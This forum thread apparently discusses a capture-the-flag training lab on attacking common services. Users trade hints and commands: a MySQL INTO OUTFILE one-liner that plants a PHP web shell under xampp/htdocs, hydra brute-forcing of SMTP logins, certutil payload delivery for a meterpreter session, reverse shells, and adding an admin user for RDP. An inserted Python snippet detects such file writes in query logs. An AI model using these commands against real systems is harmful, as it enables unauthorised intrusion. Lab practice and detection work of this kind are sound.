Attacking Common Services - Easy

Check if the user has the ability to upload files within MySQL… check with the command: show variables like "secure_file_priv";

It should be blank.

Now that we know this, think: let's upload a rev shell, because we know the web app is running PHP. Look back in the MySQL module; it will show you how to upload a file. The only thing you need to find out is where to upload this file.
Hint: check the phpinfo page, as it will show you the path: (/xampp/…?

Once you establish this basic shell, think: how do I make this shell better/upgrade it?

PM if you still need help.
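Defender-side view of the check described in the post above, as an added example that is not part of the thread: it interprets the `secure_file_priv` value and flags `INTO OUTFILE`/`DUMPFILE` writes in query-log lines by where they land. The log line layout, the `WEB_ROOTS` list and the function names are assumptions made for this sketch.

```python
import re

# Constructed lines in the style of a MySQL general query log (not from the lab target).
SAMPLE_LOG = [
    '2024-05-01T10:00:01Z 12 Query show variables like "secure_file_priv"',
    "2024-05-01T10:00:09Z 12 Query SELECT 'placeholder' INTO OUTFILE 'C:\\\\xampp\\\\htdocs\\\\example.php'",
    "2024-05-01T10:03:44Z 15 Query SELECT id, name FROM customers INTO OUTFILE 'D:/exports/customers.csv'",
    "2024-05-01T10:05:00Z 15 Query SELECT note FROM tickets WHERE note LIKE '%into outfile%'",
]

WEB_ROOTS = ("c:/xampp/htdocs",)  # assumption: directories served by the web server
SCRIPT_EXT = (".php", ".phtml", ".asp", ".aspx", ".jsp")
OUTFILE_RE = re.compile(r"into\s+(?:out|dump)file\s+(['\"])(.+?)\1", re.I)


def classify_secure_file_priv(value):
    """Map the server variable to its effect: NULL disables file import/export,
    an empty string leaves it unrestricted, a path confines it to that directory."""
    if value is None:
        return "disabled"
    if value.strip() == "":
        return "unrestricted"
    return "restricted"


def normalise(path):
    # Collapse single or doubled backslashes and slashes so Windows paths compare cleanly.
    return re.sub(r"[\\/]+", "/", path).lower()


def find_outfile_writes(lines):
    """Return (severity, target_path) for each statement that writes a file from SQL."""
    findings = []
    for line in lines:
        match = OUTFILE_RE.search(line)
        if not match:
            continue  # e.g. the phrase appearing inside a LIKE pattern is not a write
        target = normalise(match.group(2))
        in_web_root = any(target.startswith(root + "/") for root in WEB_ROOTS)
        is_script = target.endswith(SCRIPT_EXT)
        severity = "high" if in_web_root and is_script else "medium" if in_web_root or is_script else "low"
        findings.append((severity, target))
    return findings


if __name__ == "__main__":
    print("secure_file_priv = '' ->", classify_secure_file_priv(""))
    for severity, target in find_outfile_writes(SAMPLE_LOG):
        print(severity, target)
```

Setting `secure_file_priv` to NULL or to a directory outside any web root in the server configuration removes the condition the post relies on.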

It has been ages since I finished this one.
Try to gain a reverse shell after you got this basic shell.

Guys, where can I find a one-line reverse shell? I always try to type in one line because that’s the only way to upload a shell via MySQL, does someone have a good source?

nvm, found the answer

So this is for everyone who has obtained a webshell but is stuck afterwards. I found 2 ways in (not through ftp). The first one is not mentioned above and it is actually quite simple. And the second was mentioned above.

  1. The webshell gives you SYSTEM privileges so you can simply create another admin user account and then rdp to that user.

  2. The webshell you need takes some experimenting but revshells powershell3 (base64) should work. If anyone wants to chat about why the other powershell scripts do not work, pm me. I would love to discuss it so I can understand it better.

Should I create it in the path htdocs\file.ps1?

How were you able to upload the file and what directory is it in? I don’t have inlanefreight.htb/xampp/htdocs available when I browse that page.

Because there ain't such a directory. Think of a full path on the machine, not on the webserver.

@jtl5087 Special thank you bro!

I had the same problem.
I wasted too much time on a stupid mistake. I used just the username without the domain.
hydra -f smtp://{TARGET_IP} -l {FOUND_NAME}@inlanefreight.htb -P {SOME_WORDLIST} -t 64

I found f**** login and got stuck. Can anyone give a little hint what to do next?
Tried to brute ftp, smtp, rdp, sql, http auth with and without domain, but nothing. Used the wordlist from resources.

EDIT: bruted. Don’t use pws.list from resources :rage:
Use rockyou.txt instead


easy lab


u can use this
SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “C:\xampp\htdocs\backdoor.php”

I’ve been able to upload a backdoor with this method. However, the issue lies in accessing it. The web server allows uploads and downloads but not file executions, due to which a shell won’t execute. Could you please help me with this?

Web Shell – OutRunSec. This is helpful, but when you upload the reverse shell using certutil just use http:// ***/backdoor.php?cmd=.\example.exe to execute, then you will get a meterpreter session to execute shell, then find the path of the flag: dir /s flag.txt. There you go

Hey @topaz, I could upload the one-liner webshell (SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “C:\xampp\htdocs\MyWebshell.php”) but I got nothing displayed in my browser.

I can see the webshell is called but nothing is displayed, how can we get in contact via HTB Discord?

I’m stuck here too :frowning: , did u find any hint?

hey @Bluebreaker how I can find you on Discord channel? to give you a hand…

Hi! you can find me as @thebreaker26